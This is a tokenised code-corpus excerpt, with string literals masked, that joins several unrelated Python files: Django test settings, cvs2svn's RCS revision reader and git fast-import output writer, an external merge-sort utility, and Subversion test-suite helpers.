'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } <EOL> import django <EOL> if django . VERSION [ : <NUM_LIT:2> ] < ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> TEST_RUNNER = '<STR_LIT>' <EOL> else : <EOL> TEST_RUNNER = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from cvs2svn_lib . common import canonicalize_eol <EOL> from cvs2svn_lib . common import FatalError <EOL> from cvs2svn_lib . process import get_command_output <EOL> from cvs2svn_lib . context import Ctx <EOL> from cvs2svn_lib . revision_manager import RevisionReader <EOL> from cvs2svn_lib . keyword_expander import expand_keywords <EOL> from cvs2svn_lib . keyword_expander import collapse_keywords <EOL> from cvs2svn_lib . apple_single_filter import get_maybe_apple_single <EOL> class AbstractRCSRevisionReader ( RevisionReader ) : <EOL> """<STR_LIT>""" <EOL> _text_options = { <EOL> ( False , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , '<STR_LIT>' ) , <EOL> ( False , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , '<STR_LIT>' ) , <EOL> ( False , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> ( True , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> ( True , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> ( True , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> } <EOL> def get_pipe_command ( self , cvs_rev , k_option ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_content ( self , cvs_rev ) : <EOL> eol_fix = cvs_rev . get_property ( '<STR_LIT>' ) or None <EOL> keyword_handling = cvs_rev . get_property ( '<STR_LIT>' ) or None <EOL> try : <EOL> ( k_option , explicit_keyword_handling ) = self . _text_options [ <EOL> bool ( eol_fix ) , keyword_handling <EOL> ] <EOL> except KeyError : <EOL> raise FatalError ( <EOL> '<STR_LIT>' <EOL> % ( keyword_handling , cvs_rev , ) <EOL> ) <EOL> data = get_command_output ( self . get_pipe_command ( cvs_rev , k_option ) ) <EOL> if Ctx ( ) . decode_apple_single : <EOL> data = get_maybe_apple_single ( data ) <EOL> if explicit_keyword_handling == '<STR_LIT>' : <EOL> data = expand_keywords ( data , cvs_rev ) <EOL> elif explicit_keyword_handling == '<STR_LIT>' : <EOL> data = collapse_keywords ( data ) <EOL> if eol_fix : <EOL> data = canonicalize_eol ( data , eol_fix ) <EOL> return data </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import bisect <EOL> import time <EOL> import shutil <EOL> from cvs2svn_lib import config <EOL> from cvs2svn_lib . common import InternalError <EOL> from cvs2svn_lib . log import logger <EOL> from cvs2svn_lib . context import Ctx <EOL> from cvs2svn_lib . symbol import Trunk <EOL> from cvs2svn_lib . symbol import Branch <EOL> from cvs2svn_lib . symbol import Tag <EOL> from cvs2svn_lib . cvs_item import CVSSymbol <EOL> from cvs2svn_lib . dvcs_common import DVCSOutputOption <EOL> from cvs2svn_lib . dvcs_common import MirrorUpdater <EOL> from cvs2svn_lib . key_generator import KeyGenerator <EOL> from cvs2svn_lib . artifact_manager import artifact_manager <EOL> class GitRevisionWriter ( MirrorUpdater ) : <EOL> def start ( self , mirror , f ) : <EOL> MirrorUpdater . start ( self , mirror ) <EOL> self . f = f <EOL> def _modify_file ( self , cvs_item , post_commit ) : <EOL> raise NotImplementedError ( ) <EOL> def add_file ( self , cvs_rev , post_commit ) : <EOL> MirrorUpdater . add_file ( self , cvs_rev , post_commit ) <EOL> self . _modify_file ( cvs_rev , post_commit ) <EOL> def modify_file ( self , cvs_rev , post_commit ) : <EOL> MirrorUpdater . modify_file ( self , cvs_rev , post_commit ) <EOL> self . _modify_file ( cvs_rev , post_commit ) <EOL> def delete_file ( self , cvs_rev , post_commit ) : <EOL> MirrorUpdater . delete_file ( self , cvs_rev , post_commit ) <EOL> self . f . write ( '<STR_LIT>' % ( cvs_rev . cvs_file . cvs_path , ) ) <EOL> def branch_file ( self , cvs_symbol ) : <EOL> MirrorUpdater . branch_file ( self , cvs_symbol ) <EOL> self . _modify_file ( cvs_symbol , post_commit = False ) <EOL> def finish ( self ) : <EOL> MirrorUpdater . finish ( self ) <EOL> del self . f <EOL> class GitRevisionMarkWriter ( GitRevisionWriter ) : <EOL> def register_artifacts ( self , which_pass ) : <EOL> GitRevisionWriter . register_artifacts ( self , which_pass ) <EOL> if Ctx ( ) . revision_collector . blob_filename is None : <EOL> artifact_manager . register_temp_file_needed ( <EOL> config . GIT_BLOB_DATAFILE , which_pass , <EOL> ) <EOL> def start ( self , mirror , f ) : <EOL> GitRevisionWriter . start ( self , mirror , f ) <EOL> if Ctx ( ) . revision_collector . blob_filename is None : <EOL> logger . normal ( '<STR_LIT>' ) <EOL> blobf = open ( <EOL> artifact_manager . get_temp_file ( config . GIT_BLOB_DATAFILE ) , '<STR_LIT:rb>' , <EOL> ) <EOL> shutil . copyfileobj ( blobf , f ) <EOL> blobf . close ( ) <EOL> def _modify_file ( self , cvs_item , post_commit ) : <EOL> if cvs_item . cvs_file . executable : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT>' <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( mode , cvs_item . revision_reader_token , <EOL> cvs_item . cvs_file . cvs_path , ) <EOL> ) <EOL> class GitRevisionInlineWriter ( GitRevisionWriter ) : <EOL> def __init__ ( self , revision_reader ) : <EOL> self . revision_reader = revision_reader <EOL> def register_artifacts ( self , which_pass ) : <EOL> GitRevisionWriter . register_artifacts ( self , which_pass ) <EOL> self . revision_reader . register_artifacts ( which_pass ) <EOL> def start ( self , mirror , f ) : <EOL> GitRevisionWriter . start ( self , mirror , f ) <EOL> self . revision_reader . start ( ) <EOL> def _modify_file ( self , cvs_item , post_commit ) : <EOL> if cvs_item . cvs_file . executable : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT>' <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( mode , cvs_item . cvs_file . cvs_path , ) <EOL> ) <EOL> if isinstance ( cvs_item , CVSSymbol ) : <EOL> cvs_rev = cvs_item . get_cvs_revision_source ( Ctx ( ) . _cvs_items_db ) <EOL> else : <EOL> cvs_rev = cvs_item <EOL> fulltext = self . revision_reader . get_content ( cvs_rev ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( fulltext ) , ) ) <EOL> self . f . write ( fulltext ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> def finish ( self ) : <EOL> GitRevisionWriter . finish ( self ) <EOL> self . revision_reader . finish ( ) <EOL> class GitOutputOption ( DVCSOutputOption ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> _first_commit_mark = <NUM_LIT> <EOL> def __init__ ( <EOL> self , revision_writer , <EOL> dump_filename = None , <EOL> author_transforms = None , <EOL> tie_tag_fixup_branches = False , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> DVCSOutputOption . __init__ ( self ) <EOL> self . dump_filename = dump_filename <EOL> self . revision_writer = revision_writer <EOL> self . author_transforms = self . normalize_author_transforms ( <EOL> author_transforms <EOL> ) <EOL> self . tie_tag_fixup_branches = tie_tag_fixup_branches <EOL> self . _mark_generator = KeyGenerator ( GitOutputOption . _first_commit_mark ) <EOL> def register_artifacts ( self , which_pass ) : <EOL> DVCSOutputOption . register_artifacts ( self , which_pass ) <EOL> self . revision_writer . register_artifacts ( which_pass ) <EOL> def check_symbols ( self , symbol_map ) : <EOL> pass <EOL> def setup ( self , svn_rev_count ) : <EOL> DVCSOutputOption . setup ( self , svn_rev_count ) <EOL> if self . dump_filename is None : <EOL> self . f = sys . stdout <EOL> else : <EOL> self . f = open ( self . dump_filename , '<STR_LIT:wb>' ) <EOL> self . _youngest = <NUM_LIT:0> <EOL> self . _marks = { } <EOL> self . revision_writer . start ( self . _mirror , self . f ) <EOL> def _create_commit_mark ( self , lod , revnum ) : <EOL> mark = self . _mark_generator . gen_id ( ) <EOL> self . _set_lod_mark ( lod , revnum , mark ) <EOL> return mark <EOL> def _set_lod_mark ( self , lod , revnum , mark ) : <EOL> """<STR_LIT>""" <EOL> assert revnum >= self . _youngest <EOL> entry = ( revnum , mark ) <EOL> try : <EOL> modifications = self . _marks [ lod ] <EOL> except KeyError : <EOL> self . _marks [ lod ] = [ entry ] <EOL> else : <EOL> if modifications [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] == revnum : <EOL> modifications [ - <NUM_LIT:1> ] = entry <EOL> else : <EOL> modifications . append ( entry ) <EOL> self . _youngest = revnum <EOL> def _get_author ( self , svn_commit ) : <EOL> """<STR_LIT>""" <EOL> cvs_author = svn_commit . get_author ( ) <EOL> return self . _map_author ( cvs_author ) <EOL> def _map_author ( self , cvs_author ) : <EOL> return self . author_transforms . get ( cvs_author , "<STR_LIT>" % ( cvs_author , ) ) <EOL> @ staticmethod <EOL> def _get_log_msg ( svn_commit ) : <EOL> return svn_commit . get_log_msg ( ) <EOL> def process_initial_project_commit ( self , svn_commit ) : <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> self . _mirror . end_commit ( ) <EOL> def process_primary_commit ( self , svn_commit ) : <EOL> author = self . _get_author ( svn_commit ) <EOL> log_msg = self . _get_log_msg ( svn_commit ) <EOL> lods = set ( ) <EOL> for cvs_rev in svn_commit . get_cvs_items ( ) : <EOL> lods . add ( cvs_rev . lod ) <EOL> if len ( lods ) != <NUM_LIT:1> : <EOL> raise InternalError ( '<STR_LIT>' % ( len ( lods ) , ) ) <EOL> lod = lods . pop ( ) <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> if isinstance ( lod , Trunk ) : <EOL> self . f . write ( '<STR_LIT>' ) <EOL> else : <EOL> self . f . write ( '<STR_LIT>' % ( lod . name , ) ) <EOL> mark = self . _create_commit_mark ( lod , svn_commit . revnum ) <EOL> logger . normal ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . revnum , lod , mark , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' % ( author , svn_commit . date , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> for cvs_rev in svn_commit . get_cvs_items ( ) : <EOL> self . revision_writer . process_revision ( cvs_rev , post_commit = False ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> self . _mirror . end_commit ( ) <EOL> def process_post_commit ( self , svn_commit ) : <EOL> author = self . _get_author ( svn_commit ) <EOL> log_msg = self . _get_log_msg ( svn_commit ) <EOL> source_lods = set ( ) <EOL> for cvs_rev in svn_commit . cvs_revs : <EOL> source_lods . add ( cvs_rev . lod ) <EOL> if len ( source_lods ) != <NUM_LIT:1> : <EOL> raise InternalError ( '<STR_LIT>' % ( len ( source_lods ) , ) ) <EOL> source_lod = source_lods . pop ( ) <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> self . f . write ( '<STR_LIT>' ) <EOL> mark = self . _create_commit_mark ( None , svn_commit . revnum ) <EOL> logger . normal ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . revnum , mark , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' % ( author , svn_commit . date , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( self . _get_source_mark ( source_lod , svn_commit . revnum ) , ) <EOL> ) <EOL> for cvs_rev in svn_commit . cvs_revs : <EOL> self . revision_writer . process_revision ( cvs_rev , post_commit = True ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> self . _mirror . end_commit ( ) <EOL> def _get_source_mark ( self , source_lod , revnum ) : <EOL> """<STR_LIT>""" <EOL> modifications = self . _marks [ source_lod ] <EOL> i = bisect . bisect_left ( modifications , ( revnum + <NUM_LIT:1> , ) ) - <NUM_LIT:1> <EOL> ( revnum , mark ) = modifications [ i ] <EOL> return mark <EOL> def describe_lod_to_user ( self , lod ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( lod , Trunk ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return lod . name <EOL> def _describe_commit ( self , svn_commit , lod ) : <EOL> author = self . _map_author ( svn_commit . get_author ( ) ) <EOL> if author . endswith ( "<STR_LIT>" ) : <EOL> author = author [ : - <NUM_LIT:3> ] <EOL> date = time . strftime ( <EOL> "<STR_LIT>" , time . gmtime ( svn_commit . date ) <EOL> ) <EOL> log_msg = svn_commit . get_log_msg ( ) <EOL> if log_msg . find ( '<STR_LIT:\n>' ) != - <NUM_LIT:1> : <EOL> log_msg = log_msg [ : log_msg . index ( '<STR_LIT:\n>' ) ] <EOL> return "<STR_LIT>" % ( <EOL> self . describe_lod_to_user ( lod ) , date , author , log_msg , ) <EOL> def _process_symbol_commit ( self , svn_commit , git_branch , source_groups ) : <EOL> author = self . _get_author ( svn_commit ) <EOL> log_msg = self . _get_log_msg ( svn_commit ) <EOL> is_initial_lod_creation = svn_commit . symbol not in self . _marks <EOL> mark = self . _create_commit_mark ( svn_commit . symbol , svn_commit . revnum ) <EOL> if is_initial_lod_creation : <EOL> p_source_revnum , p_source_lod , p_cvs_symbols = source_groups [ <NUM_LIT:0> ] <EOL> try : <EOL> p_source_node = self . _mirror . get_old_lod_directory ( <EOL> p_source_lod , p_source_revnum <EOL> ) <EOL> except KeyError : <EOL> raise InternalError ( '<STR_LIT>' % ( p_source_lod , ) ) <EOL> cvs_files_to_delete = set ( self . _get_all_files ( p_source_node ) ) <EOL> for ( source_revnum , source_lod , cvs_symbols , ) in source_groups : <EOL> for cvs_symbol in cvs_symbols : <EOL> cvs_files_to_delete . discard ( cvs_symbol . cvs_file ) <EOL> log_msg += "<STR_LIT:\n>" <EOL> if is_initial_lod_creation : <EOL> log_msg += "<STR_LIT>" % ( <EOL> self . _describe_commit ( <EOL> Ctx ( ) . _persistence_manager . get_svn_commit ( p_source_revnum ) , <EOL> p_source_lod <EOL> ) , <EOL> ) <EOL> for ( source_revnum , source_lod , cvs_symbols , ) in source_groups [ ( is_initial_lod_creation and <NUM_LIT:1> or <NUM_LIT:0> ) : ] : <EOL> log_msg += "<STR_LIT>" % ( <EOL> self . _describe_commit ( <EOL> Ctx ( ) . _persistence_manager . get_svn_commit ( source_revnum ) , <EOL> source_lod <EOL> ) , <EOL> ) <EOL> for cvs_path in sorted ( <EOL> cvs_symbol . cvs_file . cvs_path for cvs_symbol in cvs_symbols <EOL> ) : <EOL> log_msg += "<STR_LIT>" % ( cvs_path , ) <EOL> if is_initial_lod_creation : <EOL> if cvs_files_to_delete : <EOL> log_msg += "<STR_LIT>" <EOL> for cvs_path in sorted ( <EOL> cvs_file . cvs_path for cvs_file in cvs_files_to_delete <EOL> ) : <EOL> log_msg += "<STR_LIT>" % ( cvs_path , ) <EOL> self . f . write ( '<STR_LIT>' % ( git_branch , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( author , svn_commit . date , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> if is_initial_lod_creation : <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( self . _get_source_mark ( p_source_lod , p_source_revnum ) , ) <EOL> ) <EOL> for ( source_revnum , source_lod , cvs_symbols , ) in source_groups : <EOL> for cvs_symbol in cvs_symbols : <EOL> self . revision_writer . branch_file ( cvs_symbol ) <EOL> if is_initial_lod_creation : <EOL> for cvs_file in cvs_files_to_delete : <EOL> self . f . write ( '<STR_LIT>' % ( cvs_file . cvs_path , ) ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> return mark <EOL> def process_branch_commit ( self , svn_commit ) : <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> source_groups = self . _get_source_groups ( svn_commit ) <EOL> if self . _is_simple_copy ( svn_commit , source_groups ) : <EOL> ( source_revnum , source_lod , cvs_symbols ) = source_groups [ <NUM_LIT:0> ] <EOL> logger . debug ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . symbol , source_lod , source_revnum , ) <EOL> ) <EOL> mark = self . _get_source_mark ( source_lod , source_revnum ) <EOL> self . _set_symbol ( svn_commit . symbol , mark ) <EOL> self . _mirror . copy_lod ( source_lod , svn_commit . symbol , source_revnum ) <EOL> self . _set_lod_mark ( svn_commit . symbol , svn_commit . revnum , mark ) <EOL> else : <EOL> logger . debug ( <EOL> '<STR_LIT>' % ( svn_commit . symbol , ) <EOL> ) <EOL> self . _process_symbol_commit ( <EOL> svn_commit , '<STR_LIT>' % ( svn_commit . symbol . name , ) , <EOL> source_groups , <EOL> ) <EOL> self . _mirror . end_commit ( ) <EOL> def _set_symbol ( self , symbol , mark ) : <EOL> if isinstance ( symbol , Branch ) : <EOL> category = '<STR_LIT>' <EOL> elif isinstance ( symbol , Tag ) : <EOL> category = '<STR_LIT>' <EOL> else : <EOL> raise InternalError ( ) <EOL> self . f . write ( '<STR_LIT>' % ( category , symbol . name , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> def get_tag_fixup_branch_name ( self , svn_commit ) : <EOL> return '<STR_LIT>' <EOL> def process_tag_commit ( self , svn_commit ) : <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> source_groups = self . _get_source_groups ( svn_commit ) <EOL> if self . _is_simple_copy ( svn_commit , source_groups ) : <EOL> ( source_revnum , source_lod , cvs_symbols ) = source_groups [ <NUM_LIT:0> ] <EOL> logger . debug ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . symbol , source_lod , source_revnum , ) <EOL> ) <EOL> mark = self . _get_source_mark ( source_lod , source_revnum ) <EOL> self . _set_symbol ( svn_commit . symbol , mark ) <EOL> self . _mirror . copy_lod ( source_lod , svn_commit . symbol , source_revnum ) <EOL> self . _set_lod_mark ( svn_commit . symbol , svn_commit . revnum , mark ) <EOL> else : <EOL> logger . debug ( <EOL> '<STR_LIT>' % ( svn_commit . symbol , ) <EOL> ) <EOL> fixup_branch_name = self . get_tag_fixup_branch_name ( svn_commit ) <EOL> mark = self . _process_symbol_commit ( <EOL> svn_commit , fixup_branch_name , source_groups <EOL> ) <EOL> self . _set_symbol ( svn_commit . symbol , mark ) <EOL> self . f . write ( '<STR_LIT>' % ( fixup_branch_name , ) ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> if self . tie_tag_fixup_branches : <EOL> source_lod = source_groups [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> source_lod_git_branch = '<STR_LIT>' % ( getattr ( source_lod , '<STR_LIT:name>' , '<STR_LIT>' ) , ) <EOL> mark2 = self . _create_commit_mark ( source_lod , svn_commit . revnum ) <EOL> author = self . _map_author ( Ctx ( ) . username ) <EOL> log_msg = self . _get_log_msg_for_ancestry_tie ( svn_commit ) <EOL> self . f . write ( '<STR_LIT>' % ( source_lod_git_branch , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( mark2 , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( author , svn_commit . date , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( mark , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> self . _mirror . end_commit ( ) <EOL> def _get_log_msg_for_ancestry_tie ( self , svn_commit ) : <EOL> return Ctx ( ) . text_wrapper . fill ( <EOL> Ctx ( ) . tie_tag_ancestry_message % { <EOL> '<STR_LIT>' : svn_commit . symbol . name , <EOL> } <EOL> ) <EOL> def cleanup ( self ) : <EOL> DVCSOutputOption . cleanup ( self ) <EOL> self . revision_writer . finish ( ) <EOL> if self . dump_filename is not None : <EOL> self . f . close ( ) <EOL> del self . f </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import shutil <EOL> import heapq <EOL> import itertools <EOL> import tempfile <EOL> BUFSIZE = <NUM_LIT:64> * <NUM_LIT> <EOL> def get_default_max_merge ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> _SC_OPEN_MAX = os . sysconf ( '<STR_LIT>' ) <EOL> if _SC_OPEN_MAX == - <NUM_LIT:1> : <EOL> raise ValueError ( ) <EOL> return min ( _SC_OPEN_MAX // <NUM_LIT:2> , <NUM_LIT:100> ) <EOL> except : <EOL> return <NUM_LIT:50> <EOL> DEFAULT_MAX_MERGE = get_default_max_merge ( ) <EOL> def merge ( iterables , key = None ) : <EOL> """<STR_LIT>""" <EOL> if key is None : <EOL> key = lambda x : x <EOL> values = [ ] <EOL> for index , iterable in enumerate ( iterables ) : <EOL> try : <EOL> iterator = iter ( iterable ) <EOL> value = iterator . next ( ) <EOL> except StopIteration : <EOL> pass <EOL> else : <EOL> values . append ( ( key ( value ) , index , value , iterator ) ) <EOL> heapq . heapify ( values ) <EOL> while values : <EOL> k , index , value , iterator = heapq . heappop ( values ) <EOL> yield value <EOL> try : <EOL> value = iterator . next ( ) <EOL> except StopIteration : <EOL> pass <EOL> else : <EOL> heapq . heappush ( values , ( key ( value ) , index , value , iterator ) ) <EOL> def merge_files_onepass ( input_filenames , output_filename , key = None ) : <EOL> """<STR_LIT>""" <EOL> input_filenames = list ( input_filenames ) <EOL> if len ( input_filenames ) == <NUM_LIT:1> : <EOL> shutil . move ( input_filenames [ <NUM_LIT:0> ] , output_filename ) <EOL> else : <EOL> output_file = file ( output_filename , '<STR_LIT:wb>' , BUFSIZE ) <EOL> try : <EOL> chunks = [ ] <EOL> try : <EOL> for input_filename in input_filenames : <EOL> chunks . append ( open ( input_filename , '<STR_LIT:rb>' , BUFSIZE ) ) <EOL> output_file . writelines ( merge ( chunks , key ) ) <EOL> finally : <EOL> for chunk in chunks : <EOL> try : <EOL> chunk . close ( ) <EOL> except : <EOL> pass <EOL> finally : <EOL> output_file . close ( ) <EOL> def _try_delete_files ( filenames ) : <EOL> """<STR_LIT>""" <EOL> for filename in filenames : <EOL> try : <EOL> os . remove ( filename ) <EOL> except : <EOL> pass <EOL> def tempfile_generator ( tempdirs = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if tempdirs : <EOL> tempdirs = itertools . cycle ( tempdirs ) <EOL> else : <EOL> tempdirs = itertools . repeat ( tempfile . gettempdir ( ) ) <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> ( fd , filename ) = tempfile . mkstemp ( <EOL> '<STR_LIT>' , '<STR_LIT>' % ( i , ) , tempdirs . next ( ) , False <EOL> ) <EOL> os . close ( fd ) <EOL> yield filename <EOL> i += <NUM_LIT:1> <EOL> def _merge_file_generation ( <EOL> input_filenames , delete_inputs , key = None , <EOL> max_merge = DEFAULT_MAX_MERGE , tempfiles = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> if max_merge <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if tempfiles is None : <EOL> tempfiles = tempfile_generator ( ) <EOL> filenames = list ( input_filenames ) <EOL> if len ( filenames ) <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> while filenames : <EOL> group = filenames [ : max_merge ] <EOL> del filenames [ : max_merge ] <EOL> group_output = tempfiles . next ( ) <EOL> merge_files_onepass ( group , group_output , key = key ) <EOL> if delete_inputs : <EOL> _try_delete_files ( group ) <EOL> yield group_output <EOL> def merge_files ( <EOL> input_filenames , output_filename , key = None , delete_inputs = False , <EOL> max_merge = DEFAULT_MAX_MERGE , tempfiles = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> filenames = list ( input_filenames ) <EOL> if not filenames : <EOL> open ( output_filename , '<STR_LIT:wb>' ) . close ( ) <EOL> else : <EOL> if tempfiles is None : <EOL> tempfiles = tempfile_generator ( ) <EOL> while len ( filenames ) > max_merge : <EOL> filenames = list ( <EOL> _merge_file_generation ( <EOL> filenames , delete_inputs , key = key , <EOL> max_merge = max_merge , tempfiles = tempfiles <EOL> ) <EOL> ) <EOL> delete_inputs = True <EOL> merge_files_onepass ( filenames , output_filename , key = key ) <EOL> if delete_inputs : <EOL> _try_delete_files ( filenames ) <EOL> def sort_file ( <EOL> input , output , key = None , <EOL> buffer_size = <NUM_LIT> , tempdirs = [ ] , max_merge = DEFAULT_MAX_MERGE , <EOL> ) : <EOL> tempfiles = tempfile_generator ( tempdirs ) <EOL> filenames = [ ] <EOL> input_file = file ( input , '<STR_LIT:rb>' , BUFSIZE ) <EOL> try : <EOL> try : <EOL> input_iterator = iter ( input_file ) <EOL> while True : <EOL> current_chunk = list ( itertools . islice ( input_iterator , buffer_size ) ) <EOL> if not current_chunk : <EOL> break <EOL> current_chunk . sort ( key = key ) <EOL> filename = tempfiles . next ( ) <EOL> filenames . append ( filename ) <EOL> f = open ( filename , '<STR_LIT>' , BUFSIZE ) <EOL> try : <EOL> f . writelines ( current_chunk ) <EOL> finally : <EOL> f . close ( ) <EOL> finally : <EOL> input_file . close ( ) <EOL> merge_files ( <EOL> filenames , output , key = key , <EOL> delete_inputs = True , max_merge = max_merge , tempfiles = tempfiles , <EOL> ) <EOL> finally : <EOL> _try_delete_files ( filenames ) </s>
<s> import os , shutil , re , sys , errno <EOL> import difflib , pprint , logging <EOL> import xml . parsers . expat <EOL> from xml . dom . minidom import parseString <EOL> if sys . version_info [ <NUM_LIT:0> ] >= <NUM_LIT:3> : <EOL> from io import StringIO <EOL> else : <EOL> from cStringIO import StringIO <EOL> import svntest <EOL> from svntest import main , verify , tree , wc <EOL> from svntest import Failure <EOL> logger = logging . getLogger ( ) <EOL> def _log_tree_state ( msg , actual , subtree = "<STR_LIT>" ) : <EOL> if subtree : <EOL> subtree += os . sep <EOL> o = StringIO ( ) <EOL> o . write ( msg + '<STR_LIT:\n>' ) <EOL> tree . dump_tree_script ( actual , subtree , stream = o ) <EOL> logger . warn ( o . getvalue ( ) ) <EOL> o . close ( ) <EOL> def no_sleep_for_timestamps ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> def do_sleep_for_timestamps ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def no_relocate_validation ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> def do_relocate_validation ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def setup_pristine_greek_repository ( ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( main . general_wc_dir ) : <EOL> os . makedirs ( main . general_wc_dir ) <EOL> if not os . path . exists ( main . general_repo_dir ) : <EOL> os . makedirs ( main . general_repo_dir ) <EOL> if not os . path . exists ( main . pristine_greek_repos_dir ) : <EOL> main . create_repos ( main . pristine_greek_repos_dir ) <EOL> if main . is_ra_type_dav ( ) : <EOL> authz_file = os . path . join ( main . work_dir , "<STR_LIT>" ) <EOL> main . file_write ( authz_file , "<STR_LIT>" ) <EOL> main . greek_state . write_to_disk ( main . greek_dump_dir ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> main . greek_dump_dir , <EOL> main . pristine_greek_repos_url ) <EOL> if len ( errput ) : <EOL> display_lines ( "<STR_LIT>" , <EOL> '<STR_LIT>' , None , errput ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> lastline = output . pop ( ) . strip ( ) <EOL> match = re . search ( "<STR_LIT>" , lastline ) <EOL> if not match : <EOL> logger . error ( "<STR_LIT>" ) <EOL> logger . error ( "<STR_LIT>" ) <EOL> logger . error ( lastline ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> output_tree = wc . State . from_commit ( output ) <EOL> expected_output_tree = main . greek_state . copy ( main . greek_dump_dir ) <EOL> expected_output_tree . tweak ( verb = '<STR_LIT>' , <EOL> contents = None ) <EOL> try : <EOL> expected_output_tree . compare_and_display ( '<STR_LIT>' , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> verify . display_trees ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> expected_output_tree . old_tree ( ) , <EOL> output_tree . old_tree ( ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> error_msg = "<STR_LIT>" <EOL> create_failing_hook ( main . pristine_greek_repos_dir , '<STR_LIT>' , error_msg ) <EOL> create_failing_hook ( main . pristine_greek_repos_dir , '<STR_LIT>' , error_msg ) <EOL> create_failing_hook ( main . pristine_greek_repos_dir , '<STR_LIT>' , error_msg ) 